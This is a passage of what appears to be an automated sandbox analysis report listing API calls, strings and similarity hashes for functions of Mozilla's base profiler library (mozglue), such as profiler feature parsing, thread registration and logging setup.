                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                  • Instruction ID: 59148e85d92689ed95647a0c31524b2b573815bb28e24b6f14bdb4aa1b92512b
                                                                  • Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                  • Instruction Fuzzy Hash: 6CA1A171F0021A8BDB18CE69C8913AEB7F2AFC9354F188139D925E7785D7346C068F90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentTerminate
                                                                  • String ID:
                                                                  • API String ID: 2429186680-0
                                                                  • Opcode ID: b504bc2c84bc94866ba30182de0c671a13333847d99d5fd0a32a3cd6440f0533
                                                                  • Instruction ID: 4cd4622ed91e97ac53aab92b8cf98f24934c215dbe185cecf492ecbc05d9a60c
                                                                  • Opcode Fuzzy Hash: b504bc2c84bc94866ba30182de0c671a13333847d99d5fd0a32a3cd6440f0533
                                                                  • Instruction Fuzzy Hash: F6716D71E01229CFCB08CF99D9905EDBBB2FF89314F24912ED819AB740D731A905CB94
                                                                  APIs
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default), ref: 6C63CC27
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java), ref: 6C63CC3D
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C66FE98), ref: 6C63CC56
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf), ref: 6C63CC6C
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio), ref: 6C63CC82
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio), ref: 6C63CC98
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall), ref: 6C63CCAE
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C63CCC4
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C63CCDA
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C63CCEC
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C63CCFE
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C63CD14
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C63CD82
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C63CD98
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C63CDAE
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C63CDC4
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C63CDDA
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C63CDF0
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C63CE06
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C63CE1C
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C63CE32
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C63CE48
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C63CE5E
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C63CE74
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C63CE8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: strcmp
                                                                  • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                  • API String ID: 1004003707-2809817890
                                                                  • Opcode ID: 33773cb5c82763134d5eb07059fba68b5c45a0a95a046aa21a34543a43589823
                                                                  • Instruction ID: 58e0504400a6ff802a0a3708cf858c1f8fd179d23857f68f301b404b78a8de96
                                                                  • Opcode Fuzzy Hash: 33773cb5c82763134d5eb07059fba68b5c45a0a95a046aa21a34543a43589823
                                                                  • Instruction Fuzzy Hash: E85155D194567572FE0231166D20BAA1485EF5334AF10763AFE1FA1E80FF05960AC9BF
                                                                  APIs
                                                                    • Part of subcall function 6C62AB89: EnterCriticalSection.KERNEL32(6C67E370,?,?,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284), ref: 6C62AB94
                                                                    • Part of subcall function 6C62AB89: LeaveCriticalSection.KERNEL32(6C67E370,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C62ABD1
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C604801
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C604817
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C60482D
                                                                  • __Init_thread_footer.LIBCMT ref: 6C60484A
                                                                    • Part of subcall function 6C62AB3F: EnterCriticalSection.KERNEL32(6C67E370,?,?,6C5F3527,6C67F6CC,?,?,?,?,?,?,?,?,6C5F3284), ref: 6C62AB49
                                                                    • Part of subcall function 6C62AB3F: LeaveCriticalSection.KERNEL32(6C67E370,?,6C5F3527,6C67F6CC,?,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C62AB7C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C60485F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C60487E
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C60488B
                                                                  • free.MOZGLUE(?), ref: 6C60493A
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C604956
                                                                  • free.MOZGLUE(00000000), ref: 6C604960
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C60499A
                                                                  • free.MOZGLUE(?), ref: 6C6049C6
                                                                    • Part of subcall function 6C615E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C615EDB
                                                                    • Part of subcall function 6C615E90: memset.VCRUNTIME140(ewel,000000E5,?), ref: 6C615F27
                                                                    • Part of subcall function 6C615E90: LeaveCriticalSection.KERNEL32(?), ref: 6C615FB2
                                                                  Strings
                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C604828
                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C6047FC
                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C604812
                                                                  • [I %d/%d] profiler_shutdown, xrefs: 6C604A06
                                                                  • MOZ_PROFILER_SHUTDOWN, xrefs: 6C604A42
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                  • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                  • API String ID: 1340022502-4194431170
                                                                  • Opcode ID: 168835990f753515f5cfa01bf47e1636deb04c0e4d2cbf3a6ddd833d0b9d7dc7
                                                                  • Instruction ID: 979e02eac090d4fd9042abae5b93124b6ec5ff1efc29798f1ba8088be96aa468
                                                                  • Opcode Fuzzy Hash: 168835990f753515f5cfa01bf47e1636deb04c0e4d2cbf3a6ddd833d0b9d7dc7
                                                                  • Instruction Fuzzy Hash: E5811770B041108BDB2CDF29CA84B6A3771BF52318F140A39D916A7B46D7B1D855CBAE
                                                                  APIs
                                                                    • Part of subcall function 6C604730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6044B2,6C67E21C,6C67F7F8), ref: 6C60473E
                                                                    • Part of subcall function 6C604730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C60474A
                                                                  • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6044BA
                                                                  • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6044D2
                                                                  • InitOnceExecuteOnce.KERNEL32(6C67F80C,6C5FF240,?,?), ref: 6C60451A
                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C60455C
                                                                  • LoadLibraryW.KERNEL32(?), ref: 6C604592
                                                                  • InitializeCriticalSection.KERNEL32(6C67F770), ref: 6C6045A2
                                                                  • moz_xmalloc.MOZGLUE(00000008), ref: 6C6045AA
                                                                  • moz_xmalloc.MOZGLUE(00000018), ref: 6C6045BB
                                                                  • InitOnceExecuteOnce.KERNEL32(6C67F818,6C5FF240,?,?), ref: 6C604612
                                                                  • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C604636
                                                                  • LoadLibraryW.KERNEL32(user32.dll), ref: 6C604644
                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C60466D
                                                                  • VerSetConditionMask.NTDLL ref: 6C60469F
                                                                  • VerSetConditionMask.NTDLL ref: 6C6046AB
                                                                  • VerSetConditionMask.NTDLL ref: 6C6046B2
                                                                  • VerSetConditionMask.NTDLL ref: 6C6046B9
                                                                  • VerSetConditionMask.NTDLL ref: 6C6046C0
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6046CD
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 6C6046F1
                                                                  • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6046FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                  • String ID: Ggl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                  • API String ID: 1702738223-2544451872
                                                                  • Opcode ID: e82d4212d37f90767fc7d9fdf5c7dc24667eb3e3673f5c34c0424560c1afe17e
                                                                  • Instruction ID: 78fb9482df30e09af7817960f958dd5f7dcac8000179be6fd1052aef09b30c5a
                                                                  • Opcode Fuzzy Hash: e82d4212d37f90767fc7d9fdf5c7dc24667eb3e3673f5c34c0424560c1afe17e
                                                                  • Instruction Fuzzy Hash: 90612AB07043149FEB2A8F62CD89FA577B8EB92308F048858E504AB641D7F58945CF7E
                                                                  APIs
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C63945E
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639470
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639482
                                                                    • Part of subcall function 6C639420: __Init_thread_footer.LIBCMT ref: 6C63949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F70E
                                                                  • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C63F8F9
                                                                    • Part of subcall function 6C606390: GetCurrentThreadId.KERNEL32 ref: 6C6063D0
                                                                    • Part of subcall function 6C606390: AcquireSRWLockExclusive.KERNEL32 ref: 6C6063DF
                                                                    • Part of subcall function 6C606390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C60640E
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F93A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F98A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F990
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63F994
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63F716
                                                                    • Part of subcall function 6C6394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6394EE
                                                                    • Part of subcall function 6C6394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C639508
                                                                    • Part of subcall function 6C5FB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C5FB5E0
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F739
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F746
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F793
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C67385B,00000002,?,?,?,?,?), ref: 6C63F829
                                                                  • free.MOZGLUE(?,?,00000000,?), ref: 6C63F84C
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C63F866
                                                                  • free.MOZGLUE(?), ref: 6C63FA0C
                                                                    • Part of subcall function 6C605E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C63F968), ref: 6C605E8C
                                                                    • Part of subcall function 6C605E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C605E9D
                                                                    • Part of subcall function 6C605E60: GetCurrentThreadId.KERNEL32 ref: 6C605EAB
                                                                    • Part of subcall function 6C605E60: GetCurrentThreadId.KERNEL32 ref: 6C605EB8
                                                                    • Part of subcall function 6C605E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C605ECF
                                                                    • Part of subcall function 6C605E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C605F27
                                                                    • Part of subcall function 6C605E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C605F47
                                                                    • Part of subcall function 6C605E60: GetCurrentProcess.KERNEL32 ref: 6C605F53
                                                                    • Part of subcall function 6C605E60: GetCurrentThread.KERNEL32 ref: 6C605F5C
                                                                    • Part of subcall function 6C605E60: GetCurrentProcess.KERNEL32 ref: 6C605F66
                                                                    • Part of subcall function 6C605E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C605F7E
                                                                  • free.MOZGLUE(?), ref: 6C63F9C5
                                                                  • free.MOZGLUE(?), ref: 6C63F9DA
                                                                  Strings
                                                                  • " attempted to re-register as ", xrefs: 6C63F858
                                                                  • Thread , xrefs: 6C63F789
                                                                  • [D %d/%d] profiler_register_thread(%s), xrefs: 6C63F71F
                                                                  • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C63F9A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                  • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                  • API String ID: 882766088-1834255612
                                                                  • Opcode ID: d89b1fb91a280bfc0ceed66f4c606c33b7d11351d4e2320976f3764ee07fbdc1
                                                                  • Instruction ID: 2fc213278edb15c074afbd4b16438f9f17150e4473d8af1f600c9ba158806ba6
                                                                  • Opcode Fuzzy Hash: d89b1fb91a280bfc0ceed66f4c606c33b7d11351d4e2320976f3764ee07fbdc1
                                                                  • Instruction Fuzzy Hash: DB812770A043109FDB15DF25C880AAAB7B5EFC5308F54586DE84997B51EB30D849CFAB
                                                                  APIs
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C63945E
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639470
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639482
                                                                    • Part of subcall function 6C639420: __Init_thread_footer.LIBCMT ref: 6C63949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63EE60
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63EE6D
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63EE92
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C63EEA5
                                                                  • CloseHandle.KERNEL32(?), ref: 6C63EEB4
                                                                  • free.MOZGLUE(00000000), ref: 6C63EEBB
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63EEC7
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63EECF
                                                                    • Part of subcall function 6C63DE60: GetCurrentThreadId.KERNEL32 ref: 6C63DE73
                                                                    • Part of subcall function 6C63DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C66FEF3,?,?,?,?,?,?,00000000), ref: 6C63DE7B
                                                                    • Part of subcall function 6C63DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000), ref: 6C63DEB8
                                                                    • Part of subcall function 6C63DE60: free.MOZGLUE(00000000), ref: 6C63DEFE
                                                                    • Part of subcall function 6C63DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C63DF38
                                                                    • Part of subcall function 6C62CBE8: GetCurrentProcess.KERNEL32(?,6C5F31A7), ref: 6C62CBF1
                                                                    • Part of subcall function 6C62CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5F31A7), ref: 6C62CBFA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63EF1E
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63EF2B
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63EF59
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63EFB0
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63EFBD
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63EFE1
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63EFF8
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63F000
                                                                    • Part of subcall function 6C6394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6394EE
                                                                    • Part of subcall function 6C6394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C639508
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C63F02F
                                                                    • Part of subcall function 6C63F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C63F09B
                                                                    • Part of subcall function 6C63F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C63F0AC
                                                                    • Part of subcall function 6C63F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C63F0BE
                                                                  Strings
                                                                  • [I %d/%d] profiler_pause, xrefs: 6C63F008
                                                                  • [I %d/%d] profiler_stop, xrefs: 6C63EED7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                  • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                  • API String ID: 16519850-1833026159
                                                                  • Opcode ID: 40596666866c4a4cfe934fc6c0e58af36dc0563228f1f3a03aa17809631e939d
                                                                  • Instruction ID: 3c52072c0cc5378fa5c480481d5e7accc98c7cb1b3ac08d0878bd0d8864db0fb
                                                                  • Opcode Fuzzy Hash: 40596666866c4a4cfe934fc6c0e58af36dc0563228f1f3a03aa17809631e939d
                                                                  • Instruction Fuzzy Hash: D85128316042309FDB195F66D488B997BB4EF87358F201D19EA1983B86CB744815CBBF
                                                                  APIs
                                                                  • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C608007
                                                                  • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C60801D
                                                                    • Part of subcall function 6C60CA10: malloc.MOZGLUE(?), ref: 6C60CA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C60802B
                                                                  • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C60803D
                                                                  • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C60808D
                                                                    • Part of subcall function 6C60CA10: mozalloc_abort.MOZGLUE(?), ref: 6C60CAA2
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C60809B
                                                                  • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C6080B9
                                                                  • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C6080DF
                                                                  • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6080ED
                                                                  • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6080FB
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C60810D
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C608133
                                                                  • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C608149
                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C608167
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C60817C
                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C608199
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
